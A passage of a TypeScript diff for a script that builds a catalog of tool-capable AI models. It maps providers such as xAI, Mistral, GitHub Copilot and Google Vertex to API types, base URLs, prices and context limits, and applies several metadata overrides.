+					name: m.name || modelId,
+					api: "openai-completions",
+					provider: "xai",
+					baseUrl: "https://api.x.ai/v1",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process zAi models
+		if (data.zai?.models) {
+			for (const [modelId, model] of Object.entries(data.zai.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+				const supportsImage = m.modalities?.input?.includes("image")
+
+				models.push({
+				id: modelId,
+				name: m.name || modelId,
+				api: "openai-completions",
+				provider: "zai",
+				baseUrl: "https://api.z.ai/api/coding/paas/v4",
+				reasoning: m.reasoning === true,
+				input: supportsImage ? ["text", "image"] : ["text"],
+				cost: {
+					input: m.cost?.input || 0,
+					output: m.cost?.output || 0,
+					cacheRead: m.cost?.cache_read || 0,
+					cacheWrite: m.cost?.cache_write || 0,
+				},
+				compat: {
+					supportsDeveloperRole: false,
+					thinkingFormat: "zai",
+				},
+				contextWindow: m.limit?.context || 4096,
+				maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process Mistral models
+		if (data.mistral?.models) {
+			for (const [modelId, model] of Object.entries(data.mistral.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "mistral-conversations",
+					provider: "mistral",
+					baseUrl: "https://api.mistral.ai",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process Hugging Face models
+		if (data.huggingface?.models) {
+			for (const [modelId, model] of Object.entries(data.huggingface.models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "openai-completions",
+					provider: "huggingface",
+					baseUrl: "https://router.huggingface.co/v1",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					compat: {
+						supportsDeveloperRole: false,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process OpenCode models (Zen and Go)
+		// API mapping based on provider.npm field:
+		// - @ai-sdk/openai → openai-responses
+		// - @ai-sdk/anthropic → anthropic-messages
+		// - @ai-sdk/google → google-generative-ai
+		// - null/undefined/@ai-sdk/openai-compatible → openai-completions
+		const opencodeVariants = [
+			{ key: "opencode", provider: "opencode", basePath: "https://opencode.ai/zen" },
+			{ key: "opencode-go", provider: "opencode-go", basePath: "https://opencode.ai/zen/go" },
+		] as const;
+
+		for (const variant of opencodeVariants) {
+			if (!data[variant.key]?.models) continue;
+
+			for (const [modelId, model] of Object.entries(data[variant.key].models)) {
+				const m = model as ModelsDevModel & { status?: string };
+				if (m.tool_call !== true) continue;
+				if (m.status === "deprecated") continue;
+
+				const npm = m.provider?.npm;
+				let api: Api;
+				let baseUrl: string;
+
+				if (npm === "@ai-sdk/openai") {
+					api = "openai-responses";
+					baseUrl = `${variant.basePath}/v1`;
+				} else if (npm === "@ai-sdk/anthropic") {
+					api = "anthropic-messages";
+					// Anthropic SDK appends /v1/messages to baseURL
+					baseUrl = variant.basePath;
+				} else if (npm === "@ai-sdk/google") {
+					api = "google-generative-ai";
+					baseUrl = `${variant.basePath}/v1`;
+				} else {
+					// null, undefined, or @ai-sdk/openai-compatible
+					api = "openai-completions";
+					baseUrl = `${variant.basePath}/v1`;
+				}
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api,
+					provider: variant.provider,
+					baseUrl,
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		// Process GitHub Copilot models
+		if (data["github-copilot"]?.models) {
+			for (const [modelId, model] of Object.entries(data["github-copilot"].models)) {
+				const m = model as ModelsDevModel & { status?: string };
+				if (m.tool_call !== true) continue;
+				if (m.status === "deprecated") continue;
+
+				// Claude 4.x models route to Anthropic Messages API
+				const isCopilotClaude4 = /^claude-(haiku|sonnet|opus)-4([.\-]|$)/.test(modelId);
+				// gpt-5 models require responses API, others use completions
+				const needsResponsesApi = modelId.startsWith("gpt-5") || modelId.startsWith("oswe");
+
+				const api: Api = isCopilotClaude4
+					? "anthropic-messages"
+					: needsResponsesApi
+						? "openai-responses"
+						: "openai-completions";
+
+				const copilotModel: Model<any> = {
+					id: modelId,
+					name: m.name || modelId,
+					api,
+					provider: "github-copilot",
+					baseUrl: "https://api.individual.githubcopilot.com",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 128000,
+					maxTokens: m.limit?.output || 8192,
+					headers: { ...COPILOT_STATIC_HEADERS },
+					// compat only applies to openai-completions
+					...(api === "openai-completions" ? {
+						compat: {
+							supportsStore: false,
+							supportsDeveloperRole: false,
+							supportsReasoningEffort: false,
+						},
+					} : {}),
+				};
+
+				models.push(copilotModel);
+			}
+		}
+
+		// Process MiniMax models
+		const minimaxVariants = [
+			{ key: "minimax", provider: "minimax", baseUrl: "https://api.minimax.io/anthropic" },
+			{ key: "minimax-cn", provider: "minimax-cn", baseUrl: "https://api.minimaxi.com/anthropic" },
+		] as const;
+
+		for (const { key, provider, baseUrl } of minimaxVariants) {
+			if (data[key]?.models) {
+				for (const [modelId, model] of Object.entries(data[key].models)) {
+					const m = model as ModelsDevModel;
+					if (m.tool_call !== true) continue;
+
+					models.push({
+						id: modelId,
+						name: m.name || modelId,
+						api: "anthropic-messages",
+						provider,
+						// MiniMax's Anthropic-compatible API - SDK appends /v1/messages
+						baseUrl,
+						reasoning: m.reasoning === true,
+						input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+						cost: {
+							input: m.cost?.input || 0,
+							output: m.cost?.output || 0,
+							cacheRead: m.cost?.cache_read || 0,
+							cacheWrite: m.cost?.cache_write || 0,
+						},
+						contextWindow: m.limit?.context || 4096,
+						maxTokens: m.limit?.output || 4096,
+					});
+				}
+			}
+		}
+
+		// Process Kimi For Coding models
+		if (data["kimi-for-coding"]?.models) {
+			for (const [modelId, model] of Object.entries(data["kimi-for-coding"].models)) {
+				const m = model as ModelsDevModel;
+				if (m.tool_call !== true) continue;
+
+				models.push({
+					id: modelId,
+					name: m.name || modelId,
+					api: "anthropic-messages",
+					provider: "kimi-coding",
+					// Kimi For Coding's Anthropic-compatible API - SDK appends /v1/messages
+					baseUrl: "https://api.kimi.com/coding",
+					reasoning: m.reasoning === true,
+					input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"],
+					cost: {
+						input: m.cost?.input || 0,
+						output: m.cost?.output || 0,
+						cacheRead: m.cost?.cache_read || 0,
+						cacheWrite: m.cost?.cache_write || 0,
+					},
+					contextWindow: m.limit?.context || 4096,
+					maxTokens: m.limit?.output || 4096,
+				});
+			}
+		}
+
+		console.log(`Loaded ${models.length} tool-capable models from models.dev`);
+		return models;
+	} catch (error) {
+		console.error("Failed to load models.dev data:", error);
+		return [];
+	}
+}
+
+async function generateModels() {
+	// Fetch models from both sources
+	// models.dev: Anthropic, Google, OpenAI, Groq, Cerebras
+	// OpenRouter: xAI and other providers (excluding Anthropic, Google, OpenAI)
+	// AI Gateway: OpenAI-compatible catalog with tool-capable models
+	const modelsDevModels = await loadModelsDevData();
+	const openRouterModels = await fetchOpenRouterModels();
+	const aiGatewayModels = await fetchAiGatewayModels();
+
+	// Combine models (models.dev has priority)
+	const allModels = [...modelsDevModels, ...openRouterModels, ...aiGatewayModels].filter(
+		(model) =>
+			!((model.provider === "opencode" || model.provider === "opencode-go") && model.id === "gpt-5.3-codex-spark"),
+	);
+
+	// Fix incorrect cache pricing for Claude Opus 4.5 from models.dev
+	// models.dev has 3x the correct pricing (1.5/18.75 instead of 0.5/6.25)
+	const opus45 = allModels.find(m => m.provider === "anthropic" && m.id === "claude-opus-4-5");
+	if (opus45) {
+		opus45.cost.cacheRead = 0.5;
+		opus45.cost.cacheWrite = 6.25;
+	}
+
+	// Temporary overrides until upstream model metadata is corrected.
+	for (const candidate of allModels) {
+		if (candidate.provider === "amazon-bedrock" && candidate.id.includes("anthropic.claude-opus-4-6-v1")) {
+			candidate.cost.cacheRead = 0.5;
+			candidate.cost.cacheWrite = 6.25;
+			candidate.contextWindow = 1000000;
+		}
+		if (candidate.provider === "amazon-bedrock" && candidate.id.includes("anthropic.claude-sonnet-4-6")) {
+			candidate.contextWindow = 1000000;
+		}
+		if (
+			(candidate.provider === "anthropic" ||
+				candidate.provider === "opencode" ||
+				candidate.provider === "opencode-go") &&
+			(candidate.id === "claude-opus-4-6" ||
+				candidate.id === "claude-sonnet-4-6" ||
+				candidate.id === "claude-opus-4.6" ||
+				candidate.id === "claude-sonnet-4.6")
+		) {
+			candidate.contextWindow = 1000000;
+		}
+		if (
+			candidate.provider === "google-antigravity" &&
+			(candidate.id === "claude-opus-4-6-thinking" || candidate.id === "claude-sonnet-4-6")
+		) {
+			candidate.contextWindow = 1000000;
+		}
+		// OpenCode variants list Claude Sonnet 4/4.5 with 1M context, actual limit is 200K
+		if (
+			(candidate.provider === "opencode" || candidate.provider === "opencode-go") &&
+			(candidate.id === "claude-sonnet-4-5" || candidate.id === "claude-sonnet-4")
+		) {
+			candidate.contextWindow = 200000;
+		}
+		if ((candidate.provider === "opencode" || candidate.provider === "opencode-go") && candidate.id === "gpt-5.4") {
+			candidate.contextWindow = 272000;
+			candidate.maxTokens = 128000;
+		}
+		if (candidate.provider === "openai" && candidate.id === "gpt-5.4") {
+			candidate.contextWindow = 272000;
+			candidate.maxTokens = 128000;
+		}
+		// Keep selected OpenRouter model metadata stable until upstream settles.
+		if (candidate.provider === "openrouter" && candidate.id === "moonshotai/kimi-k2.5") {
+			candidate.cost.input = 0.41;
+			candidate.cost.output = 2.06;
+			candidate.cost.cacheRead = 0.07;
+			candidate.maxTokens = 4096;
+		}
+		if (candidate.provider === "openrouter" && candidate.id === "z-ai/glm-5") {
+			candidate.cost.input = 0.6;
+			candidate.cost.output = 1.9;
+			candidate.cost.cacheRead = 0.119;
+		}
+	}
+
+
+	// Add missing EU Opus 4.6 profile
+	if (!allModels.some((m) => m.provider === "amazon-bedrock" && m.id === "eu.anthropic.claude-opus-4-6-v1")) {
+		allModels.push({
+			id: "eu.anthropic.claude-opus-4-6-v1",
+			name: "Claude Opus 4.6 (EU)",
+			api: "bedrock-converse-stream",
+			provider: "amazon-bedrock",
+			baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 5,
+				output: 25,
+				cacheRead: 0.5,
+				cacheWrite: 6.25,
+			},
+			contextWindow: 1000000,
+			maxTokens: 128000,
+		});
+	}
+
+	// Add missing Claude Opus 4.6
+	if (!allModels.some(m => m.provider === "anthropic" && m.id === "claude-opus-4-6")) {
+		allModels.push({
+			id: "claude-opus-4-6",
+			name: "Claude Opus 4.6",
+			api: "anthropic-messages",
+			baseUrl: "https://api.anthropic.com",
+			provider: "anthropic",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 5,
+				output: 25,
+				cacheRead: 0.5,
+				cacheWrite: 6.25,
+			},
+			contextWindow: 1000000,
+			maxTokens: 128000,
+		});
+	}
+
+	// Add missing Claude Sonnet 4.6
+	if (!allModels.some(m => m.provider === "anthropic" && m.id === "claude-sonnet-4-6")) {
+		allModels.push({
+			id: "claude-sonnet-4-6",
+			name: "Claude Sonnet 4.6",
+			api: "anthropic-messages",
+			baseUrl: "https://api.anthropic.com",
+			provider: "anthropic",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 3,
+				output: 15,
+				cacheRead: 0.3,
+				cacheWrite: 3.75,
+			},
+			contextWindow: 1000000,
+			maxTokens: 64000,
+		});
+	}
+
+	// Add missing Gemini 3.1 Flash Lite Preview until models.dev includes it.
+	if (!allModels.some((m) => m.provider === "google" && m.id === "gemini-3.1-flash-lite-preview")) {
+		allModels.push({
+			id: "gemini-3.1-flash-lite-preview",
+			name: "Gemini 3.1 Flash Lite Preview",
+			api: "google-generative-ai",
+			baseUrl: "https://generativelanguage.googleapis.com/v1beta",
+			provider: "google",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		});
+	}
+
+	// Add missing gpt models
+	if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5-chat-latest")) {
+		allModels.push({
+			id: "gpt-5-chat-latest",
+			name: "GPT-5 Chat Latest",
+			api: "openai-responses",
+			baseUrl: "https://api.openai.com/v1",
+			provider: "openai",
+			reasoning: false,
+			input: ["text", "image"],
+			cost: {
+				input: 1.25,
+				output: 10,
+				cacheRead: 0.125,
+				cacheWrite: 0,
+			},
+			contextWindow: 128000,
+			maxTokens: 16384,
+		});
+	}
+
+	if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.1-codex")) {
+		allModels.push({
+			id: "gpt-5.1-codex",
+			name: "GPT-5.1 Codex",
+			api: "openai-responses",
+			baseUrl: "https://api.openai.com/v1",
+			provider: "openai",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 1.25,
+				output: 5,
+				cacheRead: 0.125,
+				cacheWrite: 1.25,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		});
+	}
+
+	if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.1-codex-max")) {
+		allModels.push({
+			id: "gpt-5.1-codex-max",
+			name: "GPT-5.1 Codex Max",
+			api: "openai-responses",
+			baseUrl: "https://api.openai.com/v1",
+			provider: "openai",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 1.25,
+				output: 10,
+				cacheRead: 0.125,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		});
+	}
+
+	if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.3-codex-spark")) {
+		allModels.push({
+			id: "gpt-5.3-codex-spark",
+			name: "GPT-5.3 Codex Spark",
+			api: "openai-responses",
+			baseUrl: "https://api.openai.com/v1",
+			provider: "openai",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 128000,
+			maxTokens: 16384,
+		});
+	}
+
+	// Add missing GitHub Copilot GPT-5.3 models until models.dev includes them.
+	const copilotBaseModel = allModels.find(
+		(m) => m.provider === "github-copilot" && m.id === "gpt-5.2-codex",
+	);
+	if (copilotBaseModel) {
+		if (!allModels.some((m) => m.provider === "github-copilot" && m.id === "gpt-5.3-codex")) {
+			allModels.push({
+				...copilotBaseModel,
+				id: "gpt-5.3-codex",
+				name: "GPT-5.3 Codex",
+			});
+		}
+	}
+
+	if (!allModels.some((m) => m.provider === "openai" && m.id === "gpt-5.4")) {
+		allModels.push({
+			id: "gpt-5.4",
+			name: "GPT-5.4",
+			api: "openai-responses",
+			baseUrl: "https://api.openai.com/v1",
+			provider: "openai",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 2.5,
+				output: 15,
+				cacheRead: 0.25,
+				cacheWrite: 0,
+			},
+			contextWindow: 272000,
+			maxTokens: 128000,
+		});
+	}
+
+	// OpenAI Codex (ChatGPT OAuth) models
+	// NOTE: These are not fetched from models.dev; we keep a small, explicit list to avoid aliases.
+	// Context window is based on observed server limits (400s above ~272k), not marketing numbers.
+	const CODEX_BASE_URL = "https://chatgpt.com/backend-api";
+	const CODEX_CONTEXT = 272000;
+	const CODEX_MAX_TOKENS = 128000;
+	const codexModels: Model<"openai-codex-responses">[] = [
+		{
+			id: "gpt-5.1",
+			name: "GPT-5.1",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 },
+			contextWindow: CODEX_CONTEXT,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+		{
+			id: "gpt-5.1-codex-max",
+			name: "GPT-5.1 Codex Max",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 },
+			contextWindow: CODEX_CONTEXT,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+		{
+			id: "gpt-5.1-codex-mini",
+			name: "GPT-5.1 Codex Mini",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0.25, output: 2, cacheRead: 0.025, cacheWrite: 0 },
+			contextWindow: CODEX_CONTEXT,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+		{
+			id: "gpt-5.2",
+			name: "GPT-5.2",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 },
+			contextWindow: CODEX_CONTEXT,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+		{
+			id: "gpt-5.2-codex",
+			name: "GPT-5.2 Codex",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 },
+			contextWindow: CODEX_CONTEXT,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+		{
+			id: "gpt-5.3-codex",
+			name: "GPT-5.3 Codex",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 },
+			contextWindow: CODEX_CONTEXT,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+		{
+			id: "gpt-5.4",
+			name: "GPT-5.4",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 2.5, output: 15, cacheRead: 0.25, cacheWrite: 0 },
+			contextWindow: CODEX_CONTEXT,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+		{
+			id: "gpt-5.3-codex-spark",
+			name: "GPT-5.3 Codex Spark",
+			api: "openai-codex-responses",
+			provider: "openai-codex",
+			baseUrl: CODEX_BASE_URL,
+			reasoning: true,
+			input: ["text"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 128000,
+			maxTokens: CODEX_MAX_TOKENS,
+		},
+	];
+	allModels.push(...codexModels);
+
+	// Add missing Grok models
+	if (!allModels.some(m => m.provider === "xai" && m.id === "grok-code-fast-1")) {
+		allModels.push({
+			id: "grok-code-fast-1",
+			name: "Grok Code Fast 1",
+			api: "openai-completions",
+			baseUrl: "https://api.x.ai/v1",
+			provider: "xai",
+			reasoning: false,
+			input: ["text"],
+			cost: {
+				input: 0.2,
+				output: 1.5,
+				cacheRead: 0.02,
+				cacheWrite: 0,
+			},
+			contextWindow: 32768,
+			maxTokens: 8192,
+		});
+	}
+
+	// Add "auto" alias for openrouter/auto
+	if (!allModels.some(m => m.provider === "openrouter" && m.id === "auto")) {
+		allModels.push({
+			id: "auto",
+			name: "Auto",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				// we dont know about the costs because OpenRouter auto routes to different models
+				// and then charges you for the underlying used model
+				input:0,
+				output:0,
+				cacheRead:0,
+				cacheWrite:0,
+			},
+			contextWindow: 2000000,
+			maxTokens: 30000,
+		});
+	}
+
+	// Google Cloud Code Assist models (Gemini CLI)
+	// Uses production endpoint, standard Gemini models only
+	const CLOUD_CODE_ASSIST_ENDPOINT = "https://cloudcode-pa.googleapis.com";
+	const cloudCodeAssistModels: Model<"google-gemini-cli">[] = [
+		{
+			id: "gemini-2.5-pro",
+			name: "Gemini 2.5 Pro (Cloud Code Assist)",
+			api: "google-gemini-cli",
+			provider: "google-gemini-cli",
+			baseUrl: CLOUD_CODE_ASSIST_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+		{
+			id: "gemini-2.5-flash",
+			name: "Gemini 2.5 Flash (Cloud Code Assist)",
+			api: "google-gemini-cli",
+			provider: "google-gemini-cli",
+			baseUrl: CLOUD_CODE_ASSIST_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+		{
+			id: "gemini-2.0-flash",
+			name: "Gemini 2.0 Flash (Cloud Code Assist)",
+			api: "google-gemini-cli",
+			provider: "google-gemini-cli",
+			baseUrl: CLOUD_CODE_ASSIST_ENDPOINT,
+			reasoning: false,
+			input: ["text", "image"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 8192,
+		},
+		{
+			id: "gemini-3-pro-preview",
+			name: "Gemini 3 Pro Preview (Cloud Code Assist)",
+			api: "google-gemini-cli",
+			provider: "google-gemini-cli",
+			baseUrl: CLOUD_CODE_ASSIST_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+		{
+			id: "gemini-3-flash-preview",
+			name: "Gemini 3 Flash Preview (Cloud Code Assist)",
+			api: "google-gemini-cli",
+			provider: "google-gemini-cli",
+			baseUrl: CLOUD_CODE_ASSIST_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+		{
+			id: "gemini-3.1-pro-preview",
+			name: "Gemini 3.1 Pro Preview (Cloud Code Assist)",
+			api: "google-gemini-cli",
+			provider: "google-gemini-cli",
+			baseUrl: CLOUD_CODE_ASSIST_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+	];
+	allModels.push(...cloudCodeAssistModels);
+
+	// Antigravity models (Gemini 3, Claude, GPT-OSS via Google Cloud)
+	// Uses sandbox endpoint and different OAuth credentials for access to additional models
+	const ANTIGRAVITY_ENDPOINT = "https://daily-cloudcode-pa.sandbox.googleapis.com";
+	const antigravityModels: Model<"google-gemini-cli">[] = [
+		{
+			id: "gemini-3.1-pro-high",
+			name: "Gemini 3.1 Pro High (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			// the Model type doesn't seem to support having extended-context costs, so I'm just using the pricing for <200k input
+			cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 2.375 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+		{
+			id: "gemini-3.1-pro-low",
+			name: "Gemini 3.1 Pro Low (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			// the Model type doesn't seem to support having extended-context costs, so I'm just using the pricing for <200k input
+			cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 2.375 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+		{
+			id: "gemini-3-flash",
+			name: "Gemini 3 Flash (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0.5, output: 3, cacheRead: 0.5, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65535,
+		},
+		{
+			id: "claude-sonnet-4-5",
+			name: "Claude Sonnet 4.5 (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: false,
+			input: ["text", "image"],
+			cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 },
+			contextWindow: 200000,
+			maxTokens: 64000,
+		},
+		{
+			id: "claude-sonnet-4-5-thinking",
+			name: "Claude Sonnet 4.5 Thinking (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 },
+			contextWindow: 200000,
+			maxTokens: 64000,
+		},
+		{
+			id: "claude-opus-4-5-thinking",
+			name: "Claude Opus 4.5 Thinking (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
+			contextWindow: 200000,
+			maxTokens: 64000,
+		},
+		{
+			id: "claude-opus-4-6-thinking",
+			name: "Claude Opus 4.6 Thinking (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
+			contextWindow: 200000,
+			maxTokens: 128000,
+		},
+		{
+			id: "claude-sonnet-4-6",
+			name: "Claude Sonnet 4.6 (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 },
+			contextWindow: 200000,
+			maxTokens: 64000,
+		},
+		{
+			id: "gpt-oss-120b-medium",
+			name: "GPT-OSS 120B Medium (Antigravity)",
+			api: "google-gemini-cli",
+			provider: "google-antigravity",
+			baseUrl: ANTIGRAVITY_ENDPOINT,
+			reasoning: false,
+			input: ["text"],
+			cost: { input: 0.09, output: 0.36, cacheRead: 0, cacheWrite: 0 },
+			contextWindow: 131072,
+			maxTokens: 32768,
+		},
+	];
+	allModels.push(...antigravityModels);
+
+	const VERTEX_BASE_URL = "https://{location}-aiplatform.googleapis.com";
+	const vertexModels: Model<"google-vertex">[] = [
+		{
+			id: "gemini-3-pro-preview",
+			name: "Gemini 3 Pro Preview (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 },
+			contextWindow: 1000000,
+			maxTokens: 64000,
+		},
+		{
+			id: "gemini-3.1-pro-preview",
+			name: "Gemini 3.1 Pro Preview (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		},
+		{
+			id: "gemini-3-flash-preview",
+			name: "Gemini 3 Flash Preview (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: true,
+			input: ["text", "image"],
+			cost: { input: 0.5, output: 3, cacheRead: 0.05, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 65536,
+		},
+		{
+			id: "gemini-2.0-flash",
+			name: "Gemini 2.0 Flash (Vertex)",
+			api: "google-vertex",
+			provider: "google-vertex",
+			baseUrl: VERTEX_BASE_URL,
+			reasoning: false,
+			input: ["text", "image"],
+			cost: { input: 0.15, output: 0.6, cacheRead: 0.0375, cacheWrite: 0 },
+			contextWindow: 1048576,
+			maxTokens: 8192,
+		},
+		{
+			id: "gemini-2.0-flash-lite",
